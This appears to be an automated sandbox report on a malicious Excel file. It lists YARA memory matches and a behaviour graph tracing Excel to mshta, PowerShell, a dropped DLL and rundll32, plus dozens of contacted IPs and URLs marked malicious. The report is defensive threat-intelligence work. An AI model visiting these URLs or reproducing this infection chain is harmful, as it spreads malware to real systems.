Source: Yara match File source: 00000011.00000002.666842278.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529386246.0000000000991000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566246263.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562524 Sample: 2022-28-01_1202.xls Startdate: 29/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 43 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\2022-28-01_1202.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49165, 49166, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States 23->57 59 jurnalpjf.lan.go.id 103.206.244.105, 49168, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\SysWOW64\...\kkeql.uvv (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.154.133.20
 unknown France
12876 OnlineSASFR true
185.157.82.211
 unknown Poland
42927 S-NET-ASPL true
212.237.17.99
 unknown Italy
31034 ARUBA-ASNIT true
79.172.212.216
 unknown Hungary
61998 SZERVERPLEXHU true
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
173.214.173.220
 unknown United States
19318 IS-AS-1US true
212.24.98.99
 unknown Lithuania
62282 RACKRAYUABRakrejusLT true
138.185.72.26
 unknown Brazil
264343 EmpasoftLtdaMeBR true
178.63.25.185
 unknown Germany
24940 HETZNER-ASDE true
160.16.102.168
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
81.0.236.90
 unknown Czech Republic
15685 CASABLANCA-ASInternetCollocationProviderCZ true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
216.158.226.206
 unknown United States
19318 IS-AS-1US true
45.118.115.99
 unknown Indonesia
131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID true
51.15.4.22
 unknown France
12876 OnlineSASFR true
159.89.230.105
 unknown United States
14061 DIGITALOCEAN-ASNUS true
162.214.50.39
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
103.206.244.105
 jurnalpjf.lan.go.id Indonesia
131111 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID false
200.17.134.35
 unknown Brazil
1916 AssociacaoRedeNacionaldeEnsinoePesquisaBR true
217.182.143.207
 unknown France
16276 OVHFR true
107.182.225.142
 unknown United States
32780 HOSTINGSERVICES-INCUS true
51.38.71.0
 unknown France
16276 OVHFR true
45.118.135.203
 unknown Japan 63949 LINODE-APLinodeLLCUS true
50.116.54.215
 unknown United States
63949 LINODE-APLinodeLLCUS true
131.100.24.231
 unknown Brazil
61635 GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR true
46.55.222.11
 unknown Bulgaria
34841 BALCHIKNETBG true
41.76.108.46
 unknown South Africa
327979 DIAMATRIXZA true
173.212.193.249
 unknown Germany
51167 CONTABODE true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
178.79.147.66
 unknown United Kingdom
63949 LINODE-APLinodeLLCUS true
212.237.5.209
 unknown Italy
31034 ARUBA-ASNIT true
162.243.175.63
 unknown United States
14061 DIGITALOCEAN-ASNUS true
176.104.106.96
 unknown Serbia
198371 NINETRS true
207.38.84.195
 unknown United States
30083 AS-30083-GO-DADDY-COM-LLCUS true
164.68.99.3
 unknown Germany
51167 CONTABODE true
164.90.147.135
 hostfeeling.com United States
14061 DIGITALOCEAN-ASNUS true
192.254.71.210
 unknown United States
64235 BIGBRAINUS true
212.237.56.116
 unknown Italy
31034 ARUBA-ASNIT true
104.168.155.129
 unknown United States
54290 HOSTWINDSUS true
45.142.114.231
 unknown Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true
203.114.109.124
 unknown Thailand
131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH true
209.59.138.75
 unknown United States
32244 LIQUIDWEBUS true
159.8.59.82
 unknown United States
36351 SOFTLAYERUS true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
91.240.118.172
 unknown unknown
49453 GLOBALLAYERNL true
58.227.42.236
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
158.69.222.101
 unknown Canada
16276 OVHFR true
104.251.214.46
 unknown United States
54540 INCERO-HVVCUS true

Contacted Domains

Name IP Active
hostfeeling.com 164.90.147.135 true
jurnalpjf.lan.go.id 103.206.244.105 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://91.240.118.172/gg/ff/fe.png true
  • Avira URL Cloud: malware
 unknown
http://jurnalpjf.lan.go.id/assets/iM/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.172/gg/ff/fe.html true
  • Avira URL Cloud: malware
 unknown